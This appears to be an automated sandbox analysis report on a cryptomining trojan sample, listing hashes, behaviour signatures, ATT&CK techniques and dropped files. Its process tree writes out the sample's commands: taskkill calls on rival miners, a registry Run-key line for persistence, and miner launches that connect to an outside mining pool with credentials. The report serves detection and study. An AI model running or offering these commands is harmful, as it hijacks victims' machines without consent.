c272cea2f8c2ddc5c1fbc41da1194aa8546d3927f1508138b459e9677667b4aa

Analysis

max time kernel
129s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
06/11/2022, 22:27

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

Trojan-Ransom.Win32.Blocker.exe
Size

744KB
MD5

9a38ae7a6eea4bafd0abd6b9ef85430b
SHA1

39977abea4b0c938f55b8b966ad57344ea511756
SHA256

c272cea2f8c2ddc5c1fbc41da1194aa8546d3927f1508138b459e9677667b4aa
SHA512

a2bae9b26940d2a16c61d68b63e6b7268307650d2ebc7df2bed14d9ac899cf0d713d5cf9fcde4c713e3f5eebb66eca015ed2fb7d0d04c78fbd9510d1231589e8
SSDEEP

12288:w1NWl6sZ9rUNeOz6rvonkJpxewNQiTmlqoJBZchQE67WorXHcIx6h3iOttj8kEcc:4Ji9rUNnz6rvcuvZzTmlqojCxorXrmSd

Score

8^/10

persistence upx

Malware Config

Signatures

Executes dropped EXE 3 IoCs

pid	Process
2076	rite.exe
4780	cgminer.exe
628	minerd.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0002000000022dea-146.dat	upx
behavioral2/memory/2076-147-0x0000000000400000-0x0000000000459000-memory.dmp	upx
behavioral2/files/0x0002000000022dea-148.dat	upx
behavioral2/memory/2076-149-0x0000000000400000-0x0000000000459000-memory.dmp	upx

Loads dropped DLL 5 IoCs

pid	Process
628	minerd.exe
628	minerd.exe
628	minerd.exe
4780	cgminer.exe
4780	cgminer.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Load = "C:\\Users\\Admin\\AppData\\Roaming\\Trojan-Ransom.Win32.Blocker.exe"	reg.exe

Kills process with taskkill 4 IoCs

evasion

pid	Process
4232	taskkill.exe
4188	taskkill.exe
2520	taskkill.exe
4332	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
4384	reg.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	4332	taskkill.exe
Token: SeDebugPrivilege	2520	taskkill.exe
Token: SeDebugPrivilege	4232	taskkill.exe
Token: SeDebugPrivilege	4188	taskkill.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2692	Trojan-Ransom.Win32.Blocker.exe

Suspicious use of WriteProcessMemory 48 IoCs

description	pid	Process	procid_target
PID 2692 wrote to memory of 2100	2692	Trojan-Ransom.Win32.Blocker.exe	81
PID 2692 wrote to memory of 2100	2692	Trojan-Ransom.Win32.Blocker.exe	81
PID 2692 wrote to memory of 2100	2692	Trojan-Ransom.Win32.Blocker.exe	81
PID 2692 wrote to memory of 1412	2692	Trojan-Ransom.Win32.Blocker.exe	82
PID 2692 wrote to memory of 1412	2692	Trojan-Ransom.Win32.Blocker.exe	82
PID 2692 wrote to memory of 1412	2692	Trojan-Ransom.Win32.Blocker.exe	82
PID 2692 wrote to memory of 2972	2692	Trojan-Ransom.Win32.Blocker.exe	84
PID 2692 wrote to memory of 2972	2692	Trojan-Ransom.Win32.Blocker.exe	84
PID 2692 wrote to memory of 2972	2692	Trojan-Ransom.Win32.Blocker.exe	84
PID 2692 wrote to memory of 3996	2692	Trojan-Ransom.Win32.Blocker.exe	88
PID 2692 wrote to memory of 3996	2692	Trojan-Ransom.Win32.Blocker.exe	88
PID 2692 wrote to memory of 3996	2692	Trojan-Ransom.Win32.Blocker.exe	88
PID 2972 wrote to memory of 4232	2972	cmd.exe	89
PID 2972 wrote to memory of 4232	2972	cmd.exe	89
PID 2972 wrote to memory of 4232	2972	cmd.exe	89
PID 2100 wrote to memory of 4332	2100	cmd.exe	92
PID 2100 wrote to memory of 4332	2100	cmd.exe	92
PID 2100 wrote to memory of 4332	2100	cmd.exe	92
PID 1412 wrote to memory of 2520	1412	cmd.exe	91
PID 1412 wrote to memory of 2520	1412	cmd.exe	91
PID 1412 wrote to memory of 2520	1412	cmd.exe	91
PID 3996 wrote to memory of 4188	3996	cmd.exe	90
PID 3996 wrote to memory of 4188	3996	cmd.exe	90
PID 3996 wrote to memory of 4188	3996	cmd.exe	90
PID 2692 wrote to memory of 4884	2692	Trojan-Ransom.Win32.Blocker.exe	93
PID 2692 wrote to memory of 4884	2692	Trojan-Ransom.Win32.Blocker.exe	93
PID 2692 wrote to memory of 4884	2692	Trojan-Ransom.Win32.Blocker.exe	93
PID 2692 wrote to memory of 4864	2692	Trojan-Ransom.Win32.Blocker.exe	94
PID 2692 wrote to memory of 4864	2692	Trojan-Ransom.Win32.Blocker.exe	94
PID 2692 wrote to memory of 4864	2692	Trojan-Ransom.Win32.Blocker.exe	94
PID 4884 wrote to memory of 4384	4884	cmd.exe	97
PID 4884 wrote to memory of 4384	4884	cmd.exe	97
PID 4884 wrote to memory of 4384	4884	cmd.exe	97
PID 4864 wrote to memory of 2076	4864	cmd.exe	98
PID 4864 wrote to memory of 2076	4864	cmd.exe	98
PID 4864 wrote to memory of 2076	4864	cmd.exe	98
PID 2692 wrote to memory of 5032	2692	Trojan-Ransom.Win32.Blocker.exe	99
PID 2692 wrote to memory of 5032	2692	Trojan-Ransom.Win32.Blocker.exe	99
PID 2692 wrote to memory of 5032	2692	Trojan-Ransom.Win32.Blocker.exe	99
PID 2692 wrote to memory of 1568	2692	Trojan-Ransom.Win32.Blocker.exe	101
PID 2692 wrote to memory of 1568	2692	Trojan-Ransom.Win32.Blocker.exe	101
PID 2692 wrote to memory of 1568	2692	Trojan-Ransom.Win32.Blocker.exe	101
PID 5032 wrote to memory of 4780	5032	cmd.exe	103
PID 5032 wrote to memory of 4780	5032	cmd.exe	103
PID 5032 wrote to memory of 4780	5032	cmd.exe	103
PID 1568 wrote to memory of 628	1568	cmd.exe	104
PID 1568 wrote to memory of 628	1568	cmd.exe	104
PID 1568 wrote to memory of 628	1568	cmd.exe	104

C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Blocker.exe
"C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Blocker.exe"
1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2692
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c taskkill /IM minerd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2100
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM minerd.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4332
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c taskkill /IM cgminer.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1412
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM cgminer.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2520
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c taskkill /IM ubasoft.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2972
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM ubasoft.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4232
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c taskkill /IM jhprotominer.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3996
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /IM jhprotominer.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4188
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ /f /v Load /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Trojan-Ransom.Win32.Blocker.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4884
- - C:\Windows\SysWOW64\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ /f /v Load /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Trojan-Ransom.Win32.Blocker.exe
    3⤵
    - Adds Run key to start application
    - Modifies registry key
    PID:4384
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c cd %appdata% & rite.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4864
- - C:\Users\Admin\AppData\Roaming\rite.exe
    rite.exe
    3⤵
    - Executes dropped EXE
    PID:2076
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c cd %appdata% & cd right & cgminer.exe -o stratum+tcp://us.ltcrabbit.com:3334 -u azams.zeds -p matamu -I 12
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5032
- - C:\Users\Admin\AppData\Roaming\right\cgminer.exe
    cgminer.exe -o stratum+tcp://us.ltcrabbit.com:3334 -u azams.zeds -p matamu -I 12
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:4780
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c cd %appdata% & cd right & minerd.exe -o stratum+tcp://us.ltcrabbit.com:3334 -u azams.zeds -p matamu -t 3
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1568
- - C:\Users\Admin\AppData\Roaming\right\minerd.exe
    minerd.exe -o stratum+tcp://us.ltcrabbit.com:3334 -u azams.zeds -p matamu -t 3
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:628

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\right\cgminer.exe

Filesize
956KB

MD5
b2e8e9f8d738a97a75ee5318068d2960

SHA1
ba52cfe270abd7547ad63bec4ae5ab676e800290

SHA256
0c5f208de21292cc66aba0f08fc6f0552183ba03aef5c274c5b5043b2ac78818

SHA512
3fde39138af13004ceef1053abdbbd7209b26d8d053b636f7cadca3b3686638d14df32da8922ff45dd8a7c65b1d970475e38f34039b40c81eb056d4ecc26a089

Download Submit
C:\Users\Admin\AppData\Roaming\right\cgminer.exe

Filesize
956KB

MD5
b2e8e9f8d738a97a75ee5318068d2960

SHA1
ba52cfe270abd7547ad63bec4ae5ab676e800290

SHA256
0c5f208de21292cc66aba0f08fc6f0552183ba03aef5c274c5b5043b2ac78818

SHA512
3fde39138af13004ceef1053abdbbd7209b26d8d053b636f7cadca3b3686638d14df32da8922ff45dd8a7c65b1d970475e38f34039b40c81eb056d4ecc26a089

Download Submit
C:\Users\Admin\AppData\Roaming\right\libcurl-4.dll

Filesize
240KB

MD5
6f15c32334d2310abf30187d6294eaf5

SHA1
4cd819bece131457122a992200bc0e58ce6b8a40

SHA256
99356e0620182b9490e2a74ee03f406e155577e7e368ace2922a10d743163ee7

SHA512
34822ab7693203a6cce7846aac784f44c139d31b5d9d75306049c47ac25037e72ef4e1ce62f782bb59e5ce223878663676f42b42421ab2f2dc9150ab36694191

Download Submit
C:\Users\Admin\AppData\Roaming\right\libcurl-4.dll

Filesize
240KB

MD5
6f15c32334d2310abf30187d6294eaf5

SHA1
4cd819bece131457122a992200bc0e58ce6b8a40

SHA256
99356e0620182b9490e2a74ee03f406e155577e7e368ace2922a10d743163ee7

SHA512
34822ab7693203a6cce7846aac784f44c139d31b5d9d75306049c47ac25037e72ef4e1ce62f782bb59e5ce223878663676f42b42421ab2f2dc9150ab36694191

Download Submit
C:\Users\Admin\AppData\Roaming\right\libcurl-4.dll

Filesize
240KB

MD5
6f15c32334d2310abf30187d6294eaf5

SHA1
4cd819bece131457122a992200bc0e58ce6b8a40

SHA256
99356e0620182b9490e2a74ee03f406e155577e7e368ace2922a10d743163ee7

SHA512
34822ab7693203a6cce7846aac784f44c139d31b5d9d75306049c47ac25037e72ef4e1ce62f782bb59e5ce223878663676f42b42421ab2f2dc9150ab36694191

Download Submit
C:\Users\Admin\AppData\Roaming\right\minerd.exe

Filesize
183KB

MD5
ea5c563db06d96b90141698afd27f2fc

SHA1
40a903c091336a8108685bf891d5558863346d5f

SHA256
583b585078f37f5d399a228f1b8021ca0a9e904a55792281048bae9cfe0e95c1

SHA512
a72430144b357be500158f682b2fb7a6038dfbf12a01f9cede5c85e55cf683aa43d681992d0c26a4ccc108c75af8067aaf105cbf22a1815e712aa4bc504e4667

Download Submit
C:\Users\Admin\AppData\Roaming\right\minerd.exe

Filesize
183KB

MD5
ea5c563db06d96b90141698afd27f2fc

SHA1
40a903c091336a8108685bf891d5558863346d5f

SHA256
583b585078f37f5d399a228f1b8021ca0a9e904a55792281048bae9cfe0e95c1

SHA512
a72430144b357be500158f682b2fb7a6038dfbf12a01f9cede5c85e55cf683aa43d681992d0c26a4ccc108c75af8067aaf105cbf22a1815e712aa4bc504e4667

Download Submit
C:\Users\Admin\AppData\Roaming\right\pthreadGC2.dll

Filesize
117KB

MD5
72c1ff7f3c7474850b11fc962ee1620c

SHA1
b94f73a1ce848d18b38274c96e863df0636f48a7

SHA256
3b159da9dad9afd4bd28b5b1a53dc502a2487068055ed8c30136a76cd6924890

SHA512
1ed4b3c34dd0033ec2aa05bdacaa45041d9cd5880fdb5530ca033308ab349c09d4811bb276bbdf51a3040b7a337f9a5d33796924550962a56058203799c5bd53

Download Submit
C:\Users\Admin\AppData\Roaming\right\pthreadGC2.dll

Filesize
117KB

MD5
72c1ff7f3c7474850b11fc962ee1620c

SHA1
b94f73a1ce848d18b38274c96e863df0636f48a7

SHA256
3b159da9dad9afd4bd28b5b1a53dc502a2487068055ed8c30136a76cd6924890

SHA512
1ed4b3c34dd0033ec2aa05bdacaa45041d9cd5880fdb5530ca033308ab349c09d4811bb276bbdf51a3040b7a337f9a5d33796924550962a56058203799c5bd53

Download Submit
C:\Users\Admin\AppData\Roaming\right\zlib1.dll

Filesize
98KB

MD5
bcaf983ab27437913e76776f79b850c5

SHA1
8544045069e9f6e7a121825d3cfa95f77547bab3

SHA256
57fd78bb3d90c04ee949c062faf6725d361de34ff2fe301bce27d0238e9190ae

SHA512
49e7ecb3829d3e8c23fad59232a28c8f81eb72f7f265739cd37cad4505da089f4f8b77e100842161cf52462c05e9e8f1f3eab9fbafee1daa665e791e2fe24252

Download Submit
C:\Users\Admin\AppData\Roaming\right\zlib1.dll

Filesize
98KB

MD5
bcaf983ab27437913e76776f79b850c5

SHA1
8544045069e9f6e7a121825d3cfa95f77547bab3

SHA256
57fd78bb3d90c04ee949c062faf6725d361de34ff2fe301bce27d0238e9190ae

SHA512
49e7ecb3829d3e8c23fad59232a28c8f81eb72f7f265739cd37cad4505da089f4f8b77e100842161cf52462c05e9e8f1f3eab9fbafee1daa665e791e2fe24252

Download Submit
C:\Users\Admin\AppData\Roaming\right\zlib1.dll

Filesize
98KB

MD5
bcaf983ab27437913e76776f79b850c5

SHA1
8544045069e9f6e7a121825d3cfa95f77547bab3

SHA256
57fd78bb3d90c04ee949c062faf6725d361de34ff2fe301bce27d0238e9190ae

SHA512
49e7ecb3829d3e8c23fad59232a28c8f81eb72f7f265739cd37cad4505da089f4f8b77e100842161cf52462c05e9e8f1f3eab9fbafee1daa665e791e2fe24252

Download Submit
C:\Users\Admin\AppData\Roaming\rite.exe

Filesize
714KB

MD5
2fb622e0d2abdd9d4da636605ebdf187

SHA1
e7d7c09ee20cdeb5aaa06771917337c67be69c3f

SHA256
5f8bdbd6f544bc79156e2d77cdc3b61756c8d0bed3697d5d508a9e496cae854e

SHA512
4fa5c44633539be5aa56f96c4b09fe3dd04949f3f36d8fc95ac57fb73bb2a5328933d502935b50a6a2565c10c370d98b80858642e82ae8cb23eef223508f5685

Download Submit
C:\Users\Admin\AppData\Roaming\rite.exe

Filesize
714KB

MD5
2fb622e0d2abdd9d4da636605ebdf187

SHA1
e7d7c09ee20cdeb5aaa06771917337c67be69c3f

SHA256
5f8bdbd6f544bc79156e2d77cdc3b61756c8d0bed3697d5d508a9e496cae854e

SHA512
4fa5c44633539be5aa56f96c4b09fe3dd04949f3f36d8fc95ac57fb73bb2a5328933d502935b50a6a2565c10c370d98b80858642e82ae8cb23eef223508f5685

Download Submit
memory/2076-149-0x0000000000400000-0x0000000000459000-memory.dmp

Filesize
356KB

Download
memory/2076-147-0x0000000000400000-0x0000000000459000-memory.dmp

Filesize
356KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads